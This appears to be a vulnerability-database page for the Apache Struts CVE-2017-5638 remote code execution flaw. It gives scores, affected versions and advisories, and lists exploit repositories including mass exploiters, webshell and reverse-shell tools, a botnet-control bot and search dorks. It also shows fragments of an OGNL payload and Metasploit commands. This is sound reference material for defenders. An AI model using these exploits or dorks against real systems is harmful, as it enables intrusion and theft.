10
CVSSv2

CVE-2017-5638

Published: 11/03/2017 Updated: 04/03/2018
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 10 | Impact Score: 6 | Exploitability Score: 3.9
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

The Jakarta Multipart parser in Apache Struts 2 2.3.x prior to 2.3.32 and 2.5.x prior to 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.

Vulnerability Trend

Affected Products

Vendor Product Versions
ApacheStruts2.3.5, 2.3.6, 2.3.7, 2.3.8, 2.3.9, 2.3.10, 2.3.11, 2.3.12, 2.3.13, 2.3.14, 2.3.14.1, 2.3.14.2, 2.3.14.3, 2.3.15, 2.3.15.1, 2.3.15.2, 2.3.15.3, 2.3.16, 2.3.16.1, 2.3.16.2, 2.3.16.3, 2.3.17, 2.3.19, 2.3.20, 2.3.20.1, 2.3.20.2, 2.3.20.3, 2.3.21, 2.3.22, 2.3.23, 2.3.24, 2.3.24.1, 2.3.24.2, 2.3.24.3, 2.3.25, 2.3.26, 2.3.27, 2.3.28, 2.3.28.1, 2.3.29, 2.3.30, 2.3.31, 2.5, 2.5.1, 2.5.2, 2.5.3, 2.5.4, 2.5.5, 2.5.6, 2.5.7, 2.5.8, 2.5.9, 2.5.10

Vendor Advisories

On March 6, 2017, Apache disclosed a vulnerability in the Jakarta Multipart parser used in Apache Struts2 that could allow an attacker to execute commands remotely on a targeted system by using a crafted Content-Type, Content-Disposition, or Content-Length value This vulnerability has been assigned CVE-ID CVE-2017-5638 This advisory is availabl ...
Remote code execution vulnerability via Apache Struts 2   Multiple VMware products contain a remote code execution vulnerability due to the use of Apache Struts 2 Successful exploitation of this issue may result in the complete compromise of an affected product ...
A flaw was reported in Apache Struts 2 that could allow an attacker to perform remote code execution with a malicious Content-Type value ...

Exploits

#!/usr/bin/python # -*- coding: utf-8 -*- import urllib2 import httplib def exploit(url, cmd): payload = "%{(#_='multipart/form-data')" payload += "(#dm=@ognlOgnlContext@DEFAULT_MEMBER_ACCESS)" payload += "(#_memberAccess?" payload += "(#_memberAccess=#dm):" payload += "((#container=#context['comopensymphonyxwork2Action ...
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update ...

Mailing Lists

Apache Struts 2 versions 23x before 2332 and 25x before 25101 remote code execution exploit that provides a reverse shell ...

Nmap Scripts

http-vuln-cve2017-5638

Detects whether the specified URL is vulnerable to the Apache Struts Remote Code Execution Vulnerability (CVE-2017-5638).

nmap -p <port> --script http-vuln-cve2017-5638 <target>

PORT STATE SERVICE 80/tcp open http | http-vuln-cve2017-5638: | VULNERABLE | Apache Struts Remote Code Execution Vulnerability | State: VULNERABLE | IDs: CVE:CVE-2017-5638 | | Disclosure date: 2017-03-07 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638 | https://cwiki.apache.org/confluence/display/WW/S2-045 |_ http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html

Metasploit Modules

Apache Struts Jakarta Multipart Parser OGNL Injection

This module exploits a remote code execution vulnerability in Apache Struts version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed via http Content-Type header. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.

msf > use exploit/multi/http/struts2_content_type_ognl
      msf exploit(struts2_content_type_ognl) > show targets
            ...targets...
      msf exploit(struts2_content_type_ognl) > set TARGET <target-id>
      msf exploit(struts2_content_type_ognl) > show options
            ...show and set options...
      msf exploit(struts2_content_type_ognl) > exploit

Github Repositories

apache-struts2-CVE-2017-5638 Demo Application and Exploit Sample Apache Struts2 App Struts2-showcase: mvnrepositorycom/artifact/orgapachestruts/struts2-showcase/2312 Exploit Reference: githubcom/rapid7/metasploit-framework/issues/8064

cve-2017-5638 cve-2017-5638 Vulnerable site sample This project aims to demonstrate the CVE-2017-5638 exploitation for educational purpose For more informations, see cwikiapacheorg/confluence/display/WW/S2-045 Legal Disclaimer This project is made for educational and ethical testing purposes only Attacking targets without prior mutual consent is illegal It is the e

CVE-2017-5638 CVE-2017-5638 (PoC Exploits)

cve-2017-5638 참고_1 참고_2 참고_3 참고_4

CVE-2017-5638 | Struts s2-045 Description It is possible to perform a RCE attack with a malicious Content-Type value If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user Affected versions Struts 235 Struts 2331 Struts 25 Struts 2510 Exploitation Remediation To remediate this issue, update the affec

Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner

struts-rce-cve-2017-5638 Struts-RCE CVE-2017-5638 This is a modified exploit that creates a webshell and provides a bash/cmd like interface to interact with the webshell in the console

Modded-Apache-Struts2-RCE-Exploit-v2-CVE-2017-5638-AUTO-EXPLOITER

CVE-2017-5638 Apache Struts 235 &lt; 2331 / 25 &lt; 2510 - Remote Code Execution - Shell Script The Jakarta Multipart parser in Apache Struts 2 23x before 2332 and 25x before 25101 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Ty

Struts-Apache-ExploitPack These are just some scripts which you can use to detect and exploit the Apache Struts Vulnerability (CVE-2017-5638) There is a MassScanner and Exploiter, You can use scanner to Mass Scan a list of URLs and then exploit them by Exploiter The Exploiter will run arbitrary shell commands on the vulnerable server

CVE-2017-5638 strutsapacheorg/docs/s2-016html cvemitreorg/cgi-bin/cvenamecgi?name=CVE-2017 Metasploit Framework Exploit Module for Apache Struts Content-Type exploit Have not tested against a windows server but tested against a linux server using the payload of generic/shell_bind_tcp

StrutsShell Apache Struts (CVE-2017-5638) Shell Introduction The "LowNoiseHG (LNHG) Struts Shell" ("StrutsShell" from now on) was conceived in March 2017 after realizing the usefulness of not having to exploit Apache Struts CVE-2017-5638 manually (HTTP GET requests by hand) and after realizing the respective metasploit module for this vulnerability did not w

POC Exploit for CVE-2017-5638 Only use this exploit on systems you own or have explicit rights to test Installation If you have go already installed on your computer, go get is the way to go go get githubcom/Greynad/struts2-jakarta-inject Usage Single command execution struts2-jakarta-inject -u &lt;url&gt; -c 'id' Pseudo interactive shell struts2-jakarta-inje

Apache-Struts An exploit for Apache Struts CVE-2017-5638 Usage Testing a single URL python struts-pwnpy --url 'examplecom/struts2-showcase/indexaction' -c 'id' Nmap Recong nmap -p &lt;port&gt; --script http-vuln-cve2017-5638 &lt;target&gt;' Testing a list of URLs python struts-pwnpy --list 'urlstxt' -c 'id�

CVE-2017-5638 PoC Code in Python | DORK: ext:action Example PoC Code for CVE-2017-5638 | Apache Struts Exploit | DORK: ext:action USAGE: python strutspy victimsite dir The initial Python Script that was Posted didn't correctly format the Content-Type Header I recoded the Content Type Header to properly format Content-Type:%20{Exploit} I also added a logging and

~ ExpStruts ExpStruts is a php-based mass exploiter for CVE-2017-5638 Screenshot(s) Requirements ~ Python3 for MakMan's Google Scraper ~ Abk Khan [ @asystolik ]

struts2_cve-2017-5638 This is a sort of Java porting of the Python exploit at: wwwexploit-dbcom/exploits/41570/ This software is written to have no external dependencies DISCLAIMER This tool is intended for security engineers and appsec guys for security assessments Please use this tool responsibly I do not take responsibility for the way in which any one uses thi

struts-pwn An exploit for Apache Struts CVE-2017-5638 Usage Testing a single URL python struts-pwnpy --url 'examplecom/struts2-showcase/indexaction' -c 'id' Testing a list of URLs python struts-pwnpy --list 'urlstxt' -c 'id' Checking if the vulnerability exists against a single URL python struts-pwnpy --check --url 'h

Apache-Struts-CVE-2017-5638 Python script to test servers for Apache Struts Vulnerability (CVE-2017-5638)

test_struts2_vulnerability_CVE-2017-5638_in_MAC_OS_X test struts2 vulnerability CVE-2017-5638 in Mac OS X ###download test web app and run it in tomcat #install tomcat brew install tomcat #confirm where the tomcat installed ls -lF `which catalina` #confirm tomcat home dir ls -lF /usr/local/Cellar/tomcat/8511/libexec #create web app "struts2" in webapps of tomcat

CVE-2017-5638 CVE: 2017-5638 in different formats Most of them will require you to enter the url and you might want to change the command Please issue pull requests if you can make it so you can enter a url and command! PHP - Example localhost/2017-5638php?url=TARGET&amp;cmd=command XMLHttpRequest - CVE-2017-5638js -- will require Access-Control-Allow-Origin on tar

Apache Struts2 Vulnerability | CVE-2017-5638 | Version 25 Disclaimer This is meant for educational, and research purposes only I do not authorize or endorse any illegal or unethical use of this projects contents or information Instructions To run the webapp: java -jar ms-cybersecurity-1jar (uses embedded Tomcat) Java 18 the webapp boots on port 8080 by default (loca

S2-045 RCE Usage:python CVE-2017-5638-S2-045py url 脚本功能仅限命令执行,while死循环解决了多次命令执行的交互方式

S2-045 CVE-2017-5638 Exploit 修复方案 检测方式查看web目录下/WEB-INF/lib/目录下的struts-corexxjar ,如果这个版本在Struts235 到 Struts2331 以及 Struts25 到 Struts2510之间则存在漏洞, 更新至Strusts2332或者Strusts25101,或使用第三方的防护设备进行防护。

cve-2017-5638

remote-code-execution-sample Example shows how to use the Java Security Manager to prevent remote code execution exploits Intro to the Problem The Problem: Equifax Breach, 143 million Americans’ personal info, including names, addresses, dates of birth and SSNs compromised Only a veneer of security was in place The Exploit The vulnerability Apache Struts, CVE-2017

S2-045 Struts2 S2-045 Vulnerability environment

CVE-2017-5638 Apache Struts2 Example PoC Exploit PHP Code for CVE-2017-5638 Usage php exploitphp "127001:8080/example/indexaction" "command" ** USE AT YOUR OWN RISK**

Stutsfi An exploit for CVE-2017-5638 Remote Code Execution (RCE) Vulnerability in Apache Struts 2

#Struts2 Content-Disposition filename null-byte variant of CVE-2017-5638 Struts2 Security Bulletin S2-046 A null byte (\x00) in a request¡¯s Content-Disposition header filename field can trigger a InvalidFileNameException with the same (client controlled) filename string in the exception message that be used can trigger OGNL evaluation during error handling Note tha

#Tool to exploit security bug CVE-2017-5638 #Install Dependencies easy_install requests easy_install termcolor Contacto Para contactarse conmigo @saamux con cualquier pregunta o sugerencia

strutser This program checks for CVE-2017-5638 Usage Usage of /strutser: Usage of /strutser: -c, --concurrency int Concurrent HTTP requests (default 10) -f, --file string File containing targets -p, --ports intSlice Ports to check (default [80]) -t, --timeout int Timeout on HTTP requests (default 15) Tips For multiple ports, use the --ports argum

Common-Vulnerability-and-Exploit-5638 This is the Apache Struts CVE-2017-5638 struts 2 vulnerability The same CVE that resulted in the equifax database breach A write up on how to apply, and patch against this exploit

S2-046_POC Usage: /s2_046sh [url] /s2_045sh [url] Sample: chmod +x /s2_046sh /s2_046sh 17216152135/indexaction OUTPUT: ================HTTP GET Method================ uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_java_t:s0-s0:c0c1023 uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_j

CVE-2017-5638 Apache Struts 20 RCE vulnerability This is a script to exploit CVE-2017-5638 - It allows an attacker to inject OS commands into a web application through the content-type header Apache Struts 2 is an open-source web application framework for developing Java EE web applications It uses and extends the Java Servlet API to encourage developers to adopt a model&ndas

CVE-2017-5638 Table of Contents Overview Dependencies Usage Overview This project is a prove-of-concept for the Apache Struts vulnerabilty The goal was to create software that can generate and test random IPs for the vulnerabilty described above Use this project on your own risk and for educational purpose only Dependencies cURL cURL is used to send the crafted header t

CVE-2017-5638 This script is intended to validate Apache Struts 2 vulnerability (CVE-2017-5638), AKA Struts-Shock This is a completely harmless as it does not inject any malicious payload, only inject an HTTP header named 'STRUTS2-VALIDATION' in order to be able to validate whether is vulnerable Because of its multithread capability, it's able to run 25k+ appli

#Struts2 S2-045 (CVE-2017-5638) Exp Tools #Exp Function: Command Execute Get Target Website's Physical Path File Upload Getshell Default Webshell For Chopper Support HTTP/HTTPS Support URL With Any Port Note: Default Webshell's Password is s2045@exp #Notice The Project Is Intended For Educational/Research Purposes Mail: flyteas@gmailcom

Exploit Demo for CVE-2017-5638 Completely based on githubcom/piesecurity/apache-struts2-CVE-2017-5638 Usage: Pre-requisites: have python, docker, maven and a jdk installed clone this repo run mvn clean package in project root run docker build -t hack run docker run -d -p 8080:8080 hack once container comes online - verify by running in browser To begin testing RCE

strutszeiro Telegram Bot to manage botnets created with struts vulnerability(CVE-2017-5638) #Dependencies pip install -r requerimentstxt #Config Create a telegram bot, save the API token in config/tokenconf Create a telegram group, save the group id in config/groupconf #Start python strutszeiropy #Telegram Usage /add url - test vulnerability and add the new server /exploit

#CNVD-ID CNVD-2017-02474 发布时间 2017-03-07 危害级别 高 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 影响产品 Apache struts &gt;=235,&lt;=2331 Apache struts &gt;=25,&lt;=2510 CVE ID CVE-2017-5638 漏洞描述 Apache Struts是一款用于创建企业级Java Web应用的开源框架。 Apache Struts2存在S2-045远程代码执行漏洞。远程攻击者

Strutsy Strutsy - Mass exploitation of Apache Struts (CVE-2017-5638) vulnerability Includes blind and time based code injection techniques which significantly reduces false negatives Other features include mass URL imports to scan multiple targets in one go Usage: python strutsypy urlstxt windows/linux/default ip-address All parameters are required urlstxt - file contai

I extended Scott Campbell's script further, made it more complicated :) While "HTTP_StrutsAttack" will stop 100% of the recon, there was still miniscule chance that if a scanner hits a vulnerable system, even though we'd block the scanner, vulnerable system might still do the wget included in the HTTP request and execute the malware Since we aren't blo

OgnlContentTypeRejectorValva This is Valve for Tomcat7 to block Struts 2 Remote Code Execution vulnerability (CVE-2017-5638)

Struts2Shell An exploit (and library) for CVE-2017-5638 - Apache Struts2 S2-045 bug Installation $ npm install -g struts2shell Installation as Library $ npm install struts2shell Command Line Options -h, --help output usage information -V, --version output the version number -u, --url [target] URL to Attack -c, --cmd [command] Command to Execute Usage as Li

Apache-Struts-2-CVE-2017-5638-Exploit This exploit exploits the Apache Struts2 vulnerability (CVE-2017-5638), allowing us to execute commands remotely on the apache server How to use: $ sudo python Struts2_Shell001py ******************************************* * [!] Exploit Apache Struts2 {*}DEMO * *******************************************

CVE-2017-5638

CVE-2017-5638 Google Dork : "site:com filetype:action"

apache-struts-v2-CVE-2017-5638 Working POC for CVE 2017-5638 This repo contains a working python example demonstrating the RCE capabilities of CVE 2017-5638 Also for reference is included the Struts Showcase WAR file

CVE-2017-5638 Google Dork : "site:com filetype:action"

Apache Struts CVE-2017-5638 exploitation This simple web application is built with vulnerable Apache Struts 2510 (CVE-2017-5638) It’s vulnerable to RCE Starting web application To start vulnerable web application, execute: mvn jetty:run The application will be accessible on port 8012 by default You can change it: mvn -Djettyhttpport=&lt;port&a

cve-testing

Overview Git repository for grey hat hacking talk Agenda What is a hacker What is grey hat hacking Why is it important (survey of fortune 500 companies) Talk about equifax hack link Run the equifax hack Show them the code Walk though what it does Run the exploit against a server Show the results Decode the passwords Talk about how it was executed and the fallout for equifax

Strutshock Usage strutshock examplecom/indexaction

S2-Reaper This project is used to collect vulnerable URLs that affected by Struts2 S2-045 from the Google search results Usage python reaperpy About The reaperpy will run a google search crawler with keywords definded at crawlerconf to find vulnerable URLs crawlerconf base_url : the basic google search url keyword : eg site:gov ext:action expect_num : expect search res

CVEPoC's List of software CVE's with some "testing code" alongside an "testable" real web app implementing these vulnerabilities Command Injections: C 1 CVE-2016–3714 ==&gt; Imagetragick RCE Argument Injections: PHP 1 CVE-2016-10033 ==&gt; PHPMailer + Wordpress 46 RCE Code Injections: JAVA 1 S2-046_CVE-2017-5638 ==&gt; Stru

Struts2-045-Exp Struts2-045利用脚本 仅供测试使用 usage:python3 struts2-045-exppy url cmd

A Vulnerable Apache Struts Application Confirmed Vulnerabilities CVE Description URL 2017-5638 Remote Command Vulnerability in Apache Struts cvemitreorg/cgi-bin/cvenamecgi?name=CVE-2017-5638 Requirements: Vagrant VirtualBox SearchSploit (Optional) Setup $ git clone githubcom/evolvesecurity/vuln-struts2-vmgit $ cd vuln-struts2-vm Build Virtual M

CVE-2017-5638 Apache Struts 2 Vulnerability Remote Code Execution Reverse shell from target Author: anarc0der - githubcom/anarcoder Tested with tomcat8 Install tomcat8 Deploy WAR file githubcom/nixawk/labs/tree/master/CVE-2017-5638 Ex: Open: $ nc -lnvp 4444 python2 struntsrcepy --target=localhost:8080/struts2_23151-showcase/showcaseaction --ip=127001 --

Vulnerable Struts2 application Requirements Maven (mavenapacheorg) Struts &lt;= 2510 CVE-2017-5638 - Apache Struts 2 Multipart form RCE Requirements Locate a URL that issues a multipart form POST Getting Started The application / server can be started with the following maven command: mvn jetty:run Run the exploit (wwwexploit-dbcom/exploits/41570

check_struts This project has been created following 2017 Equifax exploit The check_strutssh script aims at retrieving any Apache struts libraries version and location found and/or loaded on the system It can be run directly on a server, or with the provided Ansible playbook, to handle several servers Possible Outputs: "Libs path and versions loaded on the system:&quo

DevSecOps Pipeline Demo Requirements This demo uses Virtual box to deploy a local GitLab instance and configure it to run a DevSecOps Pipeline demo This demonstrates a DevSecOps Pipeline using an application that contains the Struts2 vulnerability (CVE-2017-5638) made famous in the Equifax breach Pre-requisites VirtualBox Vagrant Python You will also need the Vagrant Host

DEDSECURITYTOOLS v201 a nova versão do pentestools da ded security voces voces amas tais ferramentas do programa dedsecuritypy brutexss, scannernmap, Apache-Struts-2-CVE-2017-5638-Exploit- ferramentas de desenho tambem pode ser usado com python3 scannernmap assim funciona com python3 pip3 instala o python-nmap brutexss funciona com python2 pip instalar mecanizar pip i

StrutsExp Usage strutsexp examplecom/indexaction

Commandline Emulator | CVE-2017-5638 Disclaimer This is meant for educational, and research purposes only I do not authorize or endorse any illegal or unethical use of this projects contents or information Proof of concept command line emulator to deliver payloads for CVE-2017-5638 Instructions Run: java -jar Sendjar Url: localhost/Webapp/action Supports most ba

CVE-shellshock Common Vulnerabilities and Exposures Big CVEs in the last 5 years CVE-2014-0160 - Heartbleed The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet SSL/TLS provides communication se

Penetration Testing Methodology Penetration testing Process, Methods and Real world Attacks Collections Framework and Testing Guide OWASP - Open Web Applicaiton Security Project PTES- Penetration Testing Execution Standard PCI DSS PCI Penetration Testing Guide PTF - Penetration Testing Framework OSSTMM - Open Source Security Testing Methodology Manual Pre Engagement VMware

Apache-Struts-v3 Script contiene la fusión de 3 vulnerabilidades de tipo RCE sobre ApacheStruts, además tiene la capacidad de crear shell servidor SHELL php Funcion Terminada :) jsp Funcion en desarrollo CVE ADD CVE-2013-2251 'action:', 'redirect:' and 'redirectAction' CVE-2017-5638 Content-Type CVE-2018-11776 'redirect:�

Apache-Struts-v3 Script contiene la fusión de 3 vulnerabilidades de tipo RCE sobre ApacheStruts, además tiene la capacidad de crear shell servidor SHELL php Funcion Terminada :) jsp Funcion en desarrollo CVE ADD CVE-2013-2251 'action:', 'redirect:' and 'redirectAction' CVE-2017-5638 Content-Type CVE-2018-11776 'redirect:�

Apache-Struts-v3 Script contiene la fusión de 3 vulnerabilidades de tipo RCE sobre ApacheStruts, además tiene la capacidad de crear shell servidor SHELL php Funcion Terminada :) jsp Funcion en desarrollo CVE ADD CVE-2013-2251 'action:', 'redirect:' and 'redirectAction' CVE-2017-5638 Content-Type CVE-2018-11776 'redirect:�

FwdSh3ll FwdSh3ll is a tiny open source web-payload oriented exploitation-framework for crafting forward shells What is a forward shell? Have you ever been caught in a situation when looking for an approach to a CTF box, you discover an RCE vulnerability in a web app but despite that you can't get a reverse shell no matter how hard you try due to strictly filtered out

Apache-Struts-v3 Script contiene la fusión de 3 vulnerabilidades de tipo RCE sobre ApacheStruts, además tiene la capacidad de crear shell servidor SHELL php terminado jsp proceso CVE ADD CVE-2013-2251 'action:', 'redirect:' and 'redirectAction' CVE-2017-5638 Content-Type CVE-2018-11776 'redirect:' and 'redirectAction

CVE-2018-11776-Python-PoC hook-s3c (githubcom/hook-s3c), @hook_s3c on twitter Working Python test and PoC for CVE-2018-11776, originally appearing on; githubcom/hook-s3c/CVE-2018-11776-Python-PoC What's going on? Man Yue Mo from Semmle has disclosed an Struts2 RCE vulnerability, delivered in a payload encoded in the URL path of a request Versions affected are 2

JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc Requirements Python &gt;= 27x urllib3 ipaddress Installation on Linux\Mac To install the latest version of JexBoss, please use the

JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc Requirements Python &gt;= 27x urllib3 ipaddress Installation on Linux\Mac To install the latest version of JexBoss, please use the

JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc Requirements Python &gt;= 27x urllib3 ipaddress Installation on Linux\Mac To install the latest version of JexBoss, please use the

JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc Requirements Python &gt;= 27x urllib3 ipaddress Installation on Linux\Mac To install the latest version of JexBoss, please use the

JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc Requirements Python &gt;= 27x urllib3 ipaddress Installation on Linux\Mac To install the latest version of JexBoss, please use the

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains: READMEmd - vulnerability description and how to exploit it Intruders - a set of files to give to Burp Intrude

cve-2014-0050 CVE-2014-0050 Vulnerable site sample This project aims to demonstrate the CVE-2014-0050 exploitation for educational purpose For more informations, see : wwwtrustwavecom/Resources/SpiderLabs-Blog/CVE-2014-0050--Exploit-with-Boundaries,-Loops-without-Boundaries/ githubcom/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/http/apache

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) Every section contains: READMEmd - vulnerability description and how to exploit it Intruders - a set of files to give to Burp Intruder Some exploits You might also like : Methodology and Resources

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or Every section contains: READMEmd - vulnerability description and how to exploit it Intruders - a set of files to give to Burp Intruder Some exploits You m

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains: READMEmd - vulnerability description and how to exploit it Intruders - a set of files to give to Burp Intrude

ABOUT: Sn1per is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities DEMO VIDEO: FEATURES: Automatically collects basic recon (ie whois, ping, DNS, etc) Automatically launches Google hacking queries against a target domain Automatically enumerates open ports via NMap port scanning Automatically brute forces sub-doma

环境 Requires Java 18+ and Maven 3x+ 使用方法 1下载 git clone gitoschinanet/0d/Struts2_bugsgit 2查看远程分支 git branch -a 3切换到分支 git checkout 分支名 如git checkout S2-046 4打包 mvn clean package 5部署在Tomcat中 将\target中生成的Struts2-046war复制到Tomcat下的webapps目录中,然后开启Tomcat 访问12700

ABOUT: Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes For more information regarding

ABOUT: Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes For more information regarding

ABOUT: Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes For more information regarding

ActiveScan++ ActiveScan++ extends Burp Suite's active and passive scanning capabilities Designed to add minimal network overhead, it identifies application behaviour that may be of interest to advanced testers: Potential host header attacks (password reset poisoning, cache poisoning, DNS rebinding) Edge Side Includes XML input handling Suspicious input transformation (eg

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability d

Alien-Framework ========================================================================= Version: shellmaster - v4 More CVE Exoloits Install and use: [1] git clone githubcom/colorblindpentester/Alien-Framework [2] cd Alien-Framework [3] python3 alien-frameworkpy Features [1] Completly automatic (No requirementstxt) [2] Easy to use [3] For a kali linux and Parrot

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability d

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains: READMEmd - vulnerability description and how to exploit it Intruders - a set of files to give to Burp Intrude

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains: READMEmd - vulnerability description and how to exploit it Intruders - a set of files to give to Burp Intrude

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability d

Recent Articles

Beapy: Cryptojacking Worm Hits Enterprises in China
Symantec Threat Intelligence Blog • Security Response Attack Investigation Team • 24 Apr 2019

Cryptojacking campaign we have dubbed Beapy is exploiting the EternalBlue exploit and primarily impacting enterprises in China.

Posted: 24 Apr, 20196 Min ReadThreat Intelligence SubscribeFollowtwitterfacebooklinkedinBeapy: Cryptojacking Worm Hits Enterprises in ChinaCryptojacking campaign we have dubbed Beapy is exploiting the EternalBlue exploit and primarily impacting enterprises in China.Beapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks. Beapy act...

Hackers latch onto new Apache Struts megavuln to mine cryptocurrency
The Register • John Leyden • 30 Aug 2018

Underground forums alight with Struts chat, we hear

A recently uncovered critical vulnerability in Apache Struts is already being exploited in the wild.
Threat intel firm Volexity has warned that hackers are abusing the CVE-2018-11776 vuln to attack systems running Apache Struts 2, a popular open-source framework for developing applications in Java. Specifically, some nasty characters have abused the flaw while trying to install the CNRig cryptocurrency miner, researchers said.
The vulnerability appears to be easier to exploit than th...

MassMiner Takes a Kitchen-Sink Approach to Cryptomining
Threatpost • Tara Seals • 03 May 2018

Though it falls squarely into the trend of cryptominers setting their sights on the Monero virtual currency, the MassMiner malware family is adding its own special somethin’-somethin’ to the mix. It targets Windows servers with a variety of recent and well-known exploits – all within a single executable.
In fact, MassMiner uses a veritable cornucopia of attacks: The EternalBlue National Security Agency hacking tool (CVE-2017-0143), which it uses to install DoublePulsar and the Gh0st ...

Equifax Adds 2.4 Million More People to List of Those Impacted By 2017 Breach
Threatpost • Lindsey O'Donnell • 02 Mar 2018

Equifax said that an additional 2.4 million Americans have had their personal data stolen as part of the company’s massive 2017 data breach, including their names and some of their driver’s license information.
The additional identified victims bring the total of those implicated in what has become the largest data breach of personal information in history to around 148 million people.
The consumer credit reporting agency on Thursday said that as part of an “ongoing analysis”...

IRS tax bods tell Americans to chill out about Equifax
The Register • Richard Chirgwin • 18 Oct 2017

Your personal data was probably already in crims' hands

The United States Internal Revenue Service has said that citizens affected by the Equifax breach need not panic, because it probably didn't reveal anything that hasn't already been stolen and the agency has tooled up to deal with fraudulent tax claims.
Commissioner John Koskinen, discussing whether the breach would interfere with tax collection, told journalists “a significant percent of those taxpayers already had their information in the hands of criminals”, according to a report of ...

Oracle Patches 250 Bugs in Quarterly Critical Patch Update
Threatpost • Tom Spring • 17 Oct 2017

Oracle patched 250 vulnerabilities across hundreds of different products as part of its quarterly Critical Patch Update released today.
Rounding out the list of products with the most patches is Oracle Fusion Middleware with 38, Oracle Hospitality Applications with 37 and Oracle MySQL with 25.
Of the critical patches, security researchers at Onapsis said that they identified three high-risk SQL injections vulnerabilities in Oracle’s popular Oracle E-Business Suite (EBS).
“W...

Sole Equifax security worker at fault for failed patch, says former CEO
The Register • Simon Sharwood • 04 Oct 2017

Someone failed to order the patch. If it was you, c'mere, have a hug. And a new identity

Recently-and-forcibly-retired Equifax CEO Rick Smith has laid the blame for his credit-check biz's IT security breach on a single member of the company's security team.
In testimony on Tuesday before a US House subcommittee on consumer protection, Smith explained that Equifax has a protocol whereby news of important software patches is communicated to the appropriate people within a certain time. When details of security vulnerability CVE-2017-5638 landed in March 2017, bearing bad news ab...

Equifax Says 145.5M Affected by Breach, Ex-CEO Testifies
Threatpost • Chris Brook • 03 Oct 2017

Equifax, the credit agency behind this summer’s breach of 143 million Americans, said this week the number of victims implicated in the breach has increased.
